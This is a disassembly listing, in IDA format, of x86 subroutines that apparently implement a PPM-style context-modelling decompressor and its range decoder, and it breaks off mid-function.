mov dl, [ebp+var_1B]
mov esi, [ebp+var_C]
cmp dl, [esi-1]
mov edx, esi
ja short loc_9B2CE1
loc_9B2D03: ; CODE XREF: sub_9B2C40+B4�j
lea esi, [ebp+var_20]
mov edi, edx
movsd
movsw
loc_9B2D0B: ; CODE XREF: sub_9B2C40+95�j
dec [ebp+var_8]
jnz short loc_9B2CB1
add ecx, 5
cmp byte ptr [ecx], 0
jnz short loc_9B2D80
loc_9B2D18: ; CODE XREF: sub_9B2C40+E1�j
inc [ebp+var_8]
sub ecx, 6
cmp byte ptr [ecx], 0
jz short loc_9B2D18
mov ecx, [ebp+var_8]
sub [eax+0Ah], cx
add ebx, ecx
mov cx, [eax+0Ah]
cmp cx, 1
jnz short loc_9B2D80
mov eax, [ebp+var_4]
mov edx, [eax]
mov esi, edx
lea edi, [ebp+var_14]
movsd
movsw
loc_9B2D43: ; CODE XREF: sub_9B2C40+110�j
mov al, [ebp+var_F]
shr al, 1
sub [ebp+var_F], al
sar ebx, 1
cmp ebx, 1
jg short loc_9B2D43
mov eax, [ebp+var_18]
mov ecx, [ebp+arg_0]
mov edi, [ebp+var_4]
inc eax
sar eax, 1
movsx eax, word ptr [ecx+eax*2+756h]
lea eax, [ecx+eax*4+674h]
mov esi, [eax]
mov [edx], esi
mov [eax], edx
mov [ecx], edi
lea esi, [ebp+var_14]
movsd
movsw
jmp loc_9B2E0D
; ---------------------------------------------------------------------------
loc_9B2D80: ; CODE XREF: sub_9B2C40+D6�j
; sub_9B2C40+F4�j
mov ecx, ebx
sar ecx, 1
sub ebx, ecx
add [eax+8], bx
mov ecx, [ebp+var_18]
movzx eax, word ptr [eax+0Ah]
inc ecx
sar ecx, 1
inc eax
sar eax, 1
cmp ecx, eax
jz short loc_9B2E03
mov edx, [ebp+var_4]
mov esi, [ebp+arg_0]
mov edi, [edx]
movsx ecx, word ptr [esi+ecx*2+756h]
movsx edx, word ptr [esi+eax*2+756h]
add esi, 654h
cmp ecx, edx
mov [ebp+var_18], ecx
jz short loc_9B2DFE
lea ecx, [esi+edx*4+20h]
mov ebx, [ecx]
test ebx, ebx
jz short loc_9B2DF0
mov edx, [ebx]
lea eax, [eax+eax*2]
shl eax, 2
push eax ; Size
push edi ; Src
push ebx ; Dst
mov [ecx], edx
call memcpy
mov eax, [ebp+var_18]
lea eax, [esi+eax*4+20h]
mov ecx, [eax]
mov [edi], ecx
mov [eax], edi
add esp, 0Ch
mov edi, ebx
jmp short loc_9B2DFE
; ---------------------------------------------------------------------------
loc_9B2DF0: ; CODE XREF: sub_9B2C40+188�j
mov ecx, edx
mov edx, [ebp+var_18]
push edi
mov eax, esi
call sub_9B259C
pop ecx
loc_9B2DFE: ; CODE XREF: sub_9B2C40+17E�j
; sub_9B2C40+1AE�j
mov eax, [ebp+var_4]
mov [eax], edi
loc_9B2E03: ; CODE XREF: sub_9B2C40+159�j
mov eax, [ebp+var_4]
mov eax, [eax]
mov ecx, [ebp+arg_0]
mov [ecx], eax
loc_9B2E0D: ; CODE XREF: sub_9B2C40+13B�j
pop edi
pop esi
pop ebx
leave
retn
sub_9B2C40 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B2E12 proc near ; CODE XREF: sub_9B2F62+89�p
; sub_9B2F62+E6�p
var_10C = dword ptr -10Ch
var_108 = byte ptr -108h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_7 = byte ptr -7
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10Ch
push ebx
push esi
mov esi, eax
mov eax, [esi]
mov ebx, [esi+4]
xor edx, edx
cmp [ebp+arg_0], edx
lea ecx, [ebp+var_10C]
push edi
mov edi, [eax]
mov [ebp+var_4], ecx
jnz short loc_9B2E4A
cmp [ebx], edx
mov [ebp+var_10C], eax
lea eax, [ebp+var_108]
mov [ebp+var_4], eax
jz short loc_9B2E9D
loc_9B2E4A: ; CODE XREF: sub_9B2E12+23�j
cmp [ebp+arg_4], edx
jz short loc_9B2E56
mov eax, [ebp+arg_4]
mov ebx, [ebx]
jmp short loc_9B2E76
; ---------------------------------------------------------------------------
loc_9B2E56: ; CODE XREF: sub_9B2E12+3B�j
; sub_9B2E12+73�j
mov ebx, [ebx]
cmp word ptr [ebx+0Ah], 1
jz short loc_9B2E73
mov ecx, [esi]
mov eax, [ebx+4]
mov cl, [ecx+4]
jmp short loc_9B2E6C
; ---------------------------------------------------------------------------
loc_9B2E69: ; CODE XREF: sub_9B2E12+5D�j
add eax, 6
loc_9B2E6C: ; CODE XREF: sub_9B2E12+55�j
cmp [eax+4], cl
jnz short loc_9B2E69
jmp short loc_9B2E76
; ---------------------------------------------------------------------------
loc_9B2E73: ; CODE XREF: sub_9B2E12+4B�j
lea eax, [ebx+4]
loc_9B2E76: ; CODE XREF: sub_9B2E12+42�j
; sub_9B2E12+5F�j
cmp [eax], edi
jnz short loc_9B2E89
mov ecx, [ebp+var_4]
add [ebp+var_4], 4
cmp [ebx], edx
mov [ecx], eax
jnz short loc_9B2E56
jmp short loc_9B2E8B
; ---------------------------------------------------------------------------
loc_9B2E89: ; CODE XREF: sub_9B2E12+66�j
mov ebx, [eax]
loc_9B2E8B: ; CODE XREF: sub_9B2E12+75�j
lea eax, [ebp+var_10C]
cmp [ebp+var_4], eax
jnz short loc_9B2E9D
mov eax, ebx
jmp loc_9B2F5D
; ---------------------------------------------------------------------------
loc_9B2E9D: ; CODE XREF: sub_9B2E12+36�j
; sub_9B2E12+82�j
mov cl, [edi]
mov dx, [ebx+0Ah]
inc edi
cmp dx, 1
mov [ebp+var_8], cl
mov [ebp+var_C], edi
jz short loc_9B2F11
cmp ebx, [esi+654h]
jbe loc_9B2F5B
mov eax, [ebx+4]
cmp [eax+4], cl
jz short loc_9B2EDA
mov edi, [esi+65Ch]
loc_9B2ECA: ; CODE XREF: sub_9B2E12+C6�j
add eax, 6
cmp eax, edi
ja loc_9B2F5B
cmp [eax+4], cl
jnz short loc_9B2ECA
loc_9B2EDA: ; CODE XREF: sub_9B2E12+B0�j
movzx eax, byte ptr [eax+5]
movzx ecx, word ptr [ebx+8]
movzx edx, dx
dec eax
sub ecx, edx
sub ecx, eax
lea edx, [eax+eax]
cmp edx, ecx
ja short loc_9B2EFC
lea eax, [eax+eax*4]
cmp ecx, eax
sbb eax, eax
neg eax
jmp short loc_9B2F0D
; ---------------------------------------------------------------------------
loc_9B2EFC: ; CODE XREF: sub_9B2E12+DD�j
lea edi, [ecx+55555555h]
lea eax, [edx+edi*2]
add eax, edi
add ecx, ecx
xor edx, edx
div ecx
loc_9B2F0D: ; CODE XREF: sub_9B2E12+E8�j
inc al
jmp short loc_9B2F14
; ---------------------------------------------------------------------------
loc_9B2F11: ; CODE XREF: sub_9B2E12+9C�j
mov al, [ebx+9]
loc_9B2F14: ; CODE XREF: sub_9B2E12+FD�j
add esi, 654h
mov [ebp+var_7], al
mov [ebp+arg_0], esi
loc_9B2F20: ; CODE XREF: sub_9B2E12+145�j
mov eax, [ebp+arg_0]
sub [ebp+var_4], 4
call sub_9B2981
test eax, eax
jz short loc_9B2F48
mov ecx, [ebp+var_4]
mov ecx, [ecx]
lea edi, [eax+4]
lea esi, [ebp+var_C]
movsd
mov word ptr [eax+0Ah], 1
movsw
mov [eax], ebx
mov [ecx], eax
loc_9B2F48: ; CODE XREF: sub_9B2E12+11C�j
test eax, eax
mov ebx, eax
jz short loc_9B2F5B
lea ecx, [ebp+var_10C]
cmp [ebp+var_4], ecx
jnz short loc_9B2F20
jmp short loc_9B2F5D
; ---------------------------------------------------------------------------
loc_9B2F5B: ; CODE XREF: sub_9B2E12+A4�j
; sub_9B2E12+BD�j ...
xor eax, eax
loc_9B2F5D: ; CODE XREF: sub_9B2E12+86�j
; sub_9B2E12+147�j
pop edi
pop esi
pop ebx
leave
retn
sub_9B2E12 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B2F62 proc near ; CODE XREF: sub_9B37F8+13D�p
var_24 = dword ptr -24h
var_20 = word ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 24h
push ebx
mov ebx, [ebp+arg_0]
push esi
mov esi, [ebx]
push edi
lea edi, [ebp+var_24]
movsd
movsw
mov dx, [ebp+var_20]
xor edi, edi
cmp dh, 1Fh
jnb short loc_9B2FDD
mov eax, [ebx+4]
mov eax, [eax]
test eax, eax
jz short loc_9B2FDD
cmp word ptr [eax+0Ah], 1
jz short loc_9B2FCD
mov edi, [eax+4]
cmp [edi+4], dl
jz short loc_9B2FB8
loc_9B2F99: ; CODE XREF: sub_9B2F62+3D�j
add edi, 6
cmp [edi+4], dl
jnz short loc_9B2F99
mov cl, [edi+5]
cmp cl, [edi-1]
jb short loc_9B2FB8
lea ecx, [edi-6]
push ecx
push edi
call sub_9B2C1A
add esp, 8
mov edi, ecx
loc_9B2FB8: ; CODE XREF: sub_9B2F62+35�j
; sub_9B2F62+45�j
mov cl, [edi+5]
cmp cl, 73h
jnb short loc_9B2FDD
add cl, 2
mov [edi+5], cl
add word ptr [eax+8], 2
jmp short loc_9B2FDD
; ---------------------------------------------------------------------------
loc_9B2FCD: ; CODE XREF: sub_9B2F62+2D�j
lea edi, [eax+4]
mov al, [edi+5]
cmp al, 20h
setb cl
add cl, al
mov [edi+5], cl
loc_9B2FDD: ; CODE XREF: sub_9B2F62+1D�j
; sub_9B2F62+26�j ...
cmp dword ptr [ebx+878h], 0
jnz short loc_9B301C
push edi
push 1
mov eax, ebx
call sub_9B2E12
pop ecx
pop ecx
mov ecx, [ebx]
mov [ecx], eax
mov eax, [ebx]
mov eax, [eax]
test eax, eax
mov [ebx+8], eax
mov [ebx+4], eax
jnz loc_9B30B0
loc_9B3008: ; CODE XREF: sub_9B2F62+D4�j
; sub_9B2F62+F2�j ...
mov edi, ebx
call sub_9B2A03
test eax, eax
jnz loc_9B3215
jmp loc_9B30B3
; ---------------------------------------------------------------------------
loc_9B301C: ; CODE XREF: sub_9B2F62+82�j
lea esi, [ebx+654h]
mov eax, [esi]
mov [eax], dl
inc dword ptr [esi]
mov eax, [esi]
cmp eax, [ebx+660h]
mov [ebp+var_C], esi
mov [ebp+var_14], eax
jnb short loc_9B3008
cmp [ebp+var_24], 0
jz short loc_9B3077
cmp [ebp+var_24], eax
ja short loc_9B305A
push edi
push 0
mov eax, ebx
call sub_9B2E12
test eax, eax
pop ecx
pop ecx
mov [ebp+var_24], eax
jz short loc_9B3008
mov dx, [ebp+var_20]
loc_9B305A: ; CODE XREF: sub_9B2F62+DF�j
dec dword ptr [ebx+878h]
jnz short loc_9B3081
mov eax, [ebp+var_24]
mov [ebp+var_14], eax
mov eax, [ebx+8]
xor ecx, ecx
cmp eax, [ebx+4]
setnz cl
sub [esi], ecx
jmp short loc_9B3081
; ---------------------------------------------------------------------------
loc_9B3077: ; CODE XREF: sub_9B2F62+DA�j
mov ecx, [ebx]
mov [ecx], eax
mov eax, [ebx+4]
mov [ebp+var_24], eax
loc_9B3081: ; CODE XREF: sub_9B2F62+FE�j
; sub_9B2F62+113�j
mov ecx, [ebx+4]
movzx edi, word ptr [ecx+0Ah]
movzx eax, word ptr [ecx+8]
movzx edx, dh
sub eax, edx
sub eax, edi
mov [ebp+var_8], edi
mov edi, [ebx+8]
inc eax
cmp edi, ecx
mov [ebp+var_18], edx
mov [ebp+var_1C], eax
mov [ebp+var_4], edi
jnz short loc_9B30BE
loc_9B30A7: ; CODE XREF: sub_9B2F62+2AE�j
mov eax, [ebp+var_24]
mov [ebx+4], eax
mov [ebx+8], eax
loc_9B30B0: ; CODE XREF: sub_9B2F62+A0�j
; sub_9B2F62+2BA�j
xor eax, eax
inc eax
loc_9B30B3: ; CODE XREF: sub_9B2F62+B5�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_9B30B8: ; CODE XREF: sub_9B2F62+2A8�j
mov edi, [ebp+var_4]
mov esi, [ebp+var_C]
loc_9B30BE: ; CODE XREF: sub_9B2F62+143�j
movzx edx, word ptr [edi+0Ah]
xor eax, eax
inc eax
cmp edx, eax
mov [ebp+var_10], edx
jz short loc_9B3128
test dl, al
jnz short loc_9B30F5
mov ebx, [edi+4]
mov edi, [ebp+var_C]
mov esi, edx
shr esi, 1
call sub_9B29AF
test eax, eax
mov ecx, [ebp+var_4]
mov ebx, [ebp+arg_0]
mov [ecx+4], eax
jz loc_9B3008
mov edx, [ebp+var_10]
mov edi, ecx
loc_9B30F5: ; CODE XREF: sub_9B2F62+16C�j
mov ax, [edi+8]
movzx esi, ax
mov ecx, edx
shl ecx, 3
cmp ecx, esi
sbb ecx, ecx
inc ecx
mov esi, edx
shl esi, 2
cmp [ebp+var_8], esi
sbb esi, esi
inc esi
and ecx, esi
lea esi, [edx+edx]
cmp esi, [ebp+var_8]
sbb esi, esi
neg esi
add esi, eax
lea eax, [esi+ecx*2]
mov [edi+8], ax
jmp short loc_9B317A
; ---------------------------------------------------------------------------
loc_9B3128: ; CODE XREF: sub_9B2F62+168�j
mov ecx, esi
call sub_9B2934
test eax, eax
jz loc_9B3008
lea ecx, [edi+4]
mov esi, ecx
mov edi, eax
movsd
movsw
mov [ecx], eax
mov cl, [eax+5]
cmp cl, 1Eh
jnb short loc_9B3152
shl cl, 1
mov [eax+5], cl
jmp short loc_9B3156
; ---------------------------------------------------------------------------
loc_9B3152: ; CODE XREF: sub_9B2F62+1E7�j
mov byte ptr [eax+5], 78h
loc_9B3156: ; CODE XREF: sub_9B2F62+1EE�j
movzx ax, byte ptr [eax+5]
mov edx, [ebp+var_10]
push 3
pop ecx
cmp ecx, [ebp+var_8]
sbb ecx, ecx
neg ecx
add cx, [ebx+874h]
add ecx, eax
mov eax, [ebp+var_4]
mov [eax+8], cx
mov edi, eax
loc_9B317A: ; CODE XREF: sub_9B2F62+1C4�j
movzx eax, word ptr [edi+8]
mov esi, [ebp+var_1C]
lea ecx, [eax+6]
imul ecx, [ebp+var_18]
add eax, esi
lea esi, [eax+eax*2]
shl ecx, 1
shl esi, 1
cmp ecx, esi
mov [ebp+var_10], ecx
mov esi, eax
jnb short loc_9B31B7
shl esi, 2
cmp ecx, esi
sbb esi, esi
inc esi
cmp eax, ecx
sbb eax, eax
xor ecx, ecx
mov cx, [edi+8]
neg eax
lea eax, [esi+eax+1]
add ecx, 3
jmp short loc_9B31E2
; ---------------------------------------------------------------------------
loc_9B31B7: ; CODE XREF: sub_9B2F62+236�j
imul esi, 0Fh
cmp ecx, esi
sbb ecx, ecx
inc ecx
lea esi, [eax+eax*2]
shl esi, 2
cmp [ebp+var_10], esi
lea eax, [eax+eax*8]
sbb esi, esi
inc esi
add ecx, esi
cmp [ebp+var_10], eax
sbb eax, eax
inc eax
lea eax, [ecx+eax+4]
xor ecx, ecx
mov cx, [edi+8]
add ecx, eax
loc_9B31E2: ; CODE XREF: sub_9B2F62+253�j
mov esi, [edi+4]
mov [edi+8], cx
lea ecx, [edx+edx*2]
lea esi, [esi+ecx*2]
mov ecx, [ebp+var_14]
mov [esi], ecx
mov cl, byte ptr [ebp+var_20]
mov [esi+4], cl
mov [esi+5], al
inc edx
mov [edi+0Ah], dx
mov edi, [edi]
cmp edi, [ebx+4]
mov [ebp+var_4], edi
jnz loc_9B30B8
jmp loc_9B30A7
; ---------------------------------------------------------------------------
loc_9B3215: ; CODE XREF: sub_9B2F62+AF�j
mov byte ptr [ebx+4C88h], 0
jmp loc_9B30B0
sub_9B2F62 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B3221 proc near ; CODE XREF: sub_9B37F8+34�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
movzx eax, word ptr [edi+8]
mov [esi+870h], eax
push ebx
lea ebx, [esi+85Ch]
mov eax, [ebx+8]
xor edx, edx
div dword ptr [ebx+14h]
mov ecx, [edi+4]
xor edx, edx
mov [ebp+var_4], eax
mov [ebx+8], eax
mov eax, [ebx+4]
sub eax, [ebx]
div [ebp+var_4]
mov [ebp+var_4], eax
mov eax, [esi+870h]
cmp [ebp+var_4], eax
jnb short loc_9B32AE
movzx edx, byte ptr [ecx+5]
cmp [ebp+var_4], edx
jge short loc_9B32A9
lea ebx, [edx+edx]
cmp ebx, eax
setnbe al
mov [esi+4C89h], al
mov [esi+86Ch], edx
movzx eax, al
add [esi+880h], eax
add edx, 4
mov [esi], ecx
mov [ecx+5], dl
add word ptr [edi+8], 4
cmp edx, 7Ch
jle short loc_9B32A0
push esi
mov eax, edi
call sub_9B2C40
pop ecx
loc_9B32A0: ; CODE XREF: sub_9B3221+74�j
and dword ptr [esi+868h], 0
jmp short loc_9B3314
; ---------------------------------------------------------------------------
loc_9B32A9: ; CODE XREF: sub_9B3221+45�j
cmp dword ptr [esi], 0
jnz short loc_9B32B2
loc_9B32AE: ; CODE XREF: sub_9B3221+3C�j
xor eax, eax
jmp short loc_9B3317
; ---------------------------------------------------------------------------
loc_9B32B2: ; CODE XREF: sub_9B3221+8B�j
mov byte ptr [esi+4C89h], 0
movzx ebx, word ptr [edi+0Ah]
dec ebx
jmp short loc_9B32C3
; ---------------------------------------------------------------------------
loc_9B32C0: ; CODE XREF: sub_9B3221+AE�j
dec ebx
jz short loc_9B331A
loc_9B32C3: ; CODE XREF: sub_9B3221+9D�j
movzx eax, byte ptr [ecx+0Bh]
add ecx, 6
add edx, eax
cmp edx, [ebp+var_4]
jle short loc_9B32C0
mov [esi+86Ch], edx
movzx eax, byte ptr [ecx+5]
sub edx, eax
mov [esi+868h], edx
mov [esi], ecx
add byte ptr [ecx+5], 4
add word ptr [edi+8], 4
mov al, [ecx+5]
cmp al, [ecx-1]
jbe short loc_9B3314
lea eax, [ecx-6]
push eax
push ecx
call sub_9B2C1A
add esp, 8
mov [esi], eax
cmp byte ptr [eax+5], 7Ch
jbe short loc_9B3314
push esi
mov eax, edi
call sub_9B2C40
pop ecx
loc_9B3314: ; CODE XREF: sub_9B3221+86�j
; sub_9B3221+D3�j ...
xor eax, eax
inc eax
loc_9B3317: ; CODE XREF: sub_9B3221+8F�j
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_9B331A: ; CODE XREF: sub_9B3221+A0�j
mov eax, [esi]
movzx eax, byte ptr [eax+4]
mov al, [eax+esi+0B88h]
mov [esi+4C8Ah], al
mov [esi+868h], edx
mov dl, [esi+4C88h]
add ecx, 4
movzx eax, byte ptr [ecx]
mov [eax+esi+888h], dl
movzx eax, word ptr [edi+0Ah]
mov [esi+650h], eax
dec eax
and dword ptr [esi], 0
loc_9B3354: ; CODE XREF: sub_9B3221+147�j
mov bl, [esi+4C88h]
sub ecx, 6
dec eax
movzx edx, byte ptr [ecx]
mov [edx+esi+888h], bl
jnz short loc_9B3354
mov eax, [esi+870h]
mov [esi+86Ch], eax
jmp short loc_9B3314
sub_9B3221 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B3378 proc near ; CODE XREF: sub_9B37F8+47�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov eax, [ecx]
movzx eax, byte ptr [eax+4]
mov al, [eax+ecx+0B88h]
mov [ecx+4C8Ah], al
push ebx
push esi
push edi
lea edi, [edx+4]
mov edx, [edx]
movzx edx, word ptr [edx+0Ah]
movzx edx, byte ptr [edx+ecx+0A87h]
movzx esi, byte ptr [edi+4]
movzx esi, byte ptr [esi+ecx+0B88h]
movzx ebx, byte ptr [edi+5]
shl ebx, 5
add esi, ebx
lea edx, [edx+esi*2+604h]
mov esi, [ecx+880h]
sar esi, 1Ah
and esi, 20h
add edx, esi
movzx esi, byte ptr [ecx+4C89h]
add edx, esi
movzx eax, al
add edx, eax
lea esi, [ecx+edx*2]
lea edx, [ecx+85Ch]
shr dword ptr [edx+8], 0Eh
movzx eax, word ptr [esi]
mov ebx, [edx+8]
mov [ebp+var_4], eax
mov eax, [edx+4]
sub eax, [edx]
xor edx, edx
div ebx
mov edx, [ebp+var_4]
cmp eax, edx
jnb short loc_9B3447
mov [ecx], edi
mov al, [edi+5]
cmp al, 80h
setb dl
add dl, al
mov [edi+5], dl
and dword ptr [ecx+868h], 0
movzx eax, word ptr [esi]
mov [ecx+86Ch], eax
xor eax, eax
mov ax, [esi]
movzx edx, ax
add edx, 20h
sar edx, 7
sub eax, edx
add eax, 80h
mov [esi], ax
inc dword ptr [ecx+880h]
mov byte ptr [ecx+4C89h], 1
jmp short loc_9B34A2
; ---------------------------------------------------------------------------
loc_9B3447: ; CODE XREF: sub_9B3378+87�j
mov [ecx+868h], edx
xor eax, eax
mov ax, [esi]
movzx edx, ax
add edx, 20h
sar edx, 7
sub eax, edx
mov [esi], ax
mov dl, [ecx+4C88h]
mov dword ptr [ecx+86Ch], 4000h
movzx eax, word ptr [esi]
shr eax, 0Ah
movzx eax, byte_9A6ACC[eax]
mov [ecx+874h], eax
mov dword ptr [ecx+650h], 1
movzx eax, byte ptr [edi+4]
mov [eax+ecx+888h], dl
and dword ptr [ecx], 0
mov byte ptr [ecx+4C89h], 0
loc_9B34A2: ; CODE XREF: sub_9B3378+CD�j
pop edi
pop esi
pop ebx
leave
retn
sub_9B3378 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B34A7 proc near ; CODE XREF: sub_9B3542+19�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov cx, [eax+0Ah]
cmp cx, 100h
push esi
mov esi, [ebp+arg_0]
jz short loc_9B352F
push ebx
xor ebx, ebx
cmp [edx+650h], esi
push edi
setnle bl
movzx edi, cx
movzx ecx, byte ptr [edx+esi+987h]
movzx esi, word ptr [eax+8]
mov eax, [eax]
movzx eax, word ptr [eax+0Ah]
mov [ebp+var_4], edi
imul edi, 0Bh
lea ecx, [ebx+ecx*4]
xor ebx, ebx
cmp esi, edi
setl bl
sub eax, [ebp+var_4]
lea ecx, [ebx+ecx*2]
xor ebx, ebx
cmp [ebp+arg_0], eax
setl bl
xor esi, esi
lea eax, [ebx+ecx*2]
movzx ecx, byte ptr [edx+4C8Ah]
add eax, ecx
lea eax, [edx+eax*4+0Ch]
mov si, [eax]
mov cl, [eax+2]
movzx edi, si
shr edi, cl
xor ecx, ecx
sub esi, edi
test edi, edi
setz cl
mov [eax], si
add ecx, edi
pop edi
mov [edx+870h], ecx
pop ebx
jmp short loc_9B353F
; ---------------------------------------------------------------------------
loc_9B352F: ; CODE XREF: sub_9B34A7+11�j
lea eax, [edx+64Ch]
mov dword ptr [edx+870h], 1
loc_9B353F: ; CODE XREF: sub_9B34A7+86�j
pop esi
leave
retn
sub_9B34A7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B3542 proc near ; CODE XREF: sub_9B37F8+132�p
var_410 = dword ptr -410h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_5 = byte ptr -5
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 410h
push edi
movzx edi, word ptr [ebx+0Ah]
sub edi, [esi+650h]
mov eax, ebx
push edi
mov edx, esi
call sub_9B34A7
mov [ebp+var_C], eax
lea eax, [ebp+var_410]
mov [ebp+var_10], eax
mov eax, [ebx+4]
sub eax, 6
and [ebp+var_4], 0
pop ecx
loc_9B3577: ; CODE XREF: sub_9B3542+49�j
; sub_9B3542+5C�j
movzx edx, byte ptr [eax+0Ah]
mov cl, [esi+4C88h]
add eax, 6
cmp [edx+esi+888h], cl
jz short loc_9B3577
movzx ecx, byte ptr [eax+5]
add [ebp+var_4], ecx
mov ecx, [ebp+var_10]
add [ebp+var_10], 4
dec edi
mov [ecx], eax
jnz short loc_9B3577
mov edi, [ebp+var_4]
add [esi+870h], edi
lea ecx, [esi+85Ch]
mov eax, [ecx+8]
xor edx, edx
div dword ptr [ecx+14h]
xor edx, edx
mov [ebp+var_4], eax
mov [ecx+8], eax
mov eax, [ecx+4]
sub eax, [ecx]
mov ecx, [esi+870h]
div [ebp+var_4]
cmp eax, ecx
mov [ebp+var_4], eax
jb short loc_9B35DB
xor eax, eax
jmp loc_9B36BA
; ---------------------------------------------------------------------------
loc_9B35DB: ; CODE XREF: sub_9B3542+90�j
cmp [ebp+var_4], edi
mov edx, [ebp+var_410]
lea eax, [ebp+var_410]
jge short loc_9B3668
mov ecx, edx
movzx ecx, byte ptr [ecx+5]
jmp short loc_9B35FF
; ---------------------------------------------------------------------------
loc_9B35F4: ; CODE XREF: sub_9B3542+C0�j
add eax, 4
mov edx, [eax]
movzx edi, byte ptr [edx+5]
add ecx, edi
loc_9B35FF: ; CODE XREF: sub_9B3542+B0�j
cmp ecx, [ebp+var_4]
jle short loc_9B35F4
mov edi, [ebp+var_C]
mov [esi+86Ch], ecx
movzx eax, byte ptr [edx+5]
sub ecx, eax
mov [esi+868h], ecx
mov cl, [edi+2]
cmp cl, 7
mov [ebp+var_5], cl
jnb short loc_9B363A
dec byte ptr [edi+3]
jnz short loc_9B363A
shl word ptr [edi], 1
mov al, 3
shl al, cl
mov [edi+3], al
mov al, cl
inc al
mov [edi+2], al
loc_9B363A: ; CODE XREF: sub_9B3542+E0�j
; sub_9B3542+E5�j
mov [esi], edx
add byte ptr [edx+5], 4
add word ptr [ebx+8], 4
cmp byte ptr [edx+5], 7Ch
jbe short loc_9B3654
push esi
mov eax, ebx
call sub_9B2C40
pop ecx
loc_9B3654: ; CODE XREF: sub_9B3542+107�j
mov eax, [esi+884h]
inc byte ptr [esi+4C88h]
mov [esi+880h], eax
jmp short loc_9B36B7
; ---------------------------------------------------------------------------
loc_9B3668: ; CODE XREF: sub_9B3542+A8�j
mov [esi+868h], edi
mov [esi+86Ch], ecx
movzx edi, word ptr [ebx+0Ah]
sub edi, [esi+650h]
lea eax, [ebp+var_410]
sub eax, 4
loc_9B3687: ; CODE XREF: sub_9B3542+15C�j
mov dl, [esi+4C88h]
add eax, 4
dec edi
mov ecx, [eax]
movzx ecx, byte ptr [ecx+4]
mov [ecx+esi+888h], dl
jnz short loc_9B3687
mov eax, [ebp+var_C]
mov cx, [esi+870h]
add [eax], cx
movzx eax, word ptr [ebx+0Ah]
mov [esi+650h], eax
loc_9B36B7: ; CODE XREF: sub_9B3542+124�j
xor eax, eax
inc eax
loc_9B36BA: ; CODE XREF: sub_9B3542+94�j
pop edi
leave
retn
sub_9B3542 endp
; =============== S U B R O U T I N E =======================================
sub_9B36BD proc near ; CODE XREF: sub_9B202D+AB�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
xor ecx, ecx
mov [eax+670h], ecx
mov [eax+4], ecx
mov [eax+8], ecx
retn
sub_9B36BD endp
; =============== S U B R O U T I N E =======================================
sub_9B36D0 proc near ; CODE XREF: sub_9B202D+E8�p
; sub_9B239F+1E�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
add eax, 654h
jmp sub_9B25FE
sub_9B36D0 endp
; =============== S U B R O U T I N E =======================================
sub_9B36DE proc near ; CODE XREF: sub_9B1547+878�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push edi
lea edi, [esi+654h]
mov eax, edi
call sub_9B25FE
xor eax, eax
inc eax
call sub_9B2613
push 2
pop eax
pop edi
mov ecx, esi
pop esi
jmp sub_9B2B65
sub_9B36DE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B3705 proc near ; CODE XREF: sub_9B0AAE+6B�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
push edi
push [ebp+arg_8]
push [ebp+arg_4]
call sub_9B05B9
mov ebx, [ebp+arg_0]
mov edi, eax
mov [ebp+var_8], edi
shr edi, 5
and edi, 1
pop ecx
pop ecx
jz loc_9B37B6
push [ebp+arg_8]
push [ebp+arg_4]
call sub_9B05B9
pop ecx
pop ecx
mov [ebp+var_C], eax
loc_9B373E: ; CODE XREF: sub_9B3705+B8�j
test byte ptr [ebp+var_8], 40h
jz short loc_9B3756
push [ebp+arg_8]
push [ebp+arg_4]
call sub_9B05B9
pop ecx
pop ecx
mov ecx, [ebp+arg_C]
mov [ecx], eax
loc_9B3756: ; CODE XREF: sub_9B3705+3D�j
push esi
lea esi, [ebx+85Ch]
and dword ptr [esi+4], 0
and dword ptr [esi], 0
or dword ptr [esi+8], 0FFFFFFFFh
mov [ebp+var_4], 4
loc_9B376F: ; CODE XREF: sub_9B3705+85�j
push [ebp+arg_8]
push [ebp+arg_4]
call sub_9B05B9
pop ecx
pop ecx
mov ecx, [esi+4]
shl ecx, 8
or eax, ecx
dec [ebp+var_4]
mov [esi+4], eax
jnz short loc_9B376F
test edi, edi
jz short loc_9B37EB
mov eax, [ebp+var_8]
and eax, 1Fh
inc eax
mov esi, eax
cmp esi, 10h
jle short loc_9B37A2
lea esi, [esi+esi*2-20h]
loc_9B37A2: ; CODE XREF: sub_9B3705+97�j
cmp esi, 1
jnz short loc_9B37C7
lea eax, [ebx+654h]
loc_9B37AD: ; CODE XREF: sub_9B3705+E4�j
call sub_9B25FE
xor eax, eax
jmp short loc_9B37F3
; ---------------------------------------------------------------------------
loc_9B37B6: ; CODE XREF: sub_9B3705+23�j
cmp dword ptr [ebx+670h], 0
jnz loc_9B373E
xor eax, eax
jmp short loc_9B37F4
; ---------------------------------------------------------------------------
loc_9B37C7: ; CODE XREF: sub_9B3705+A0�j
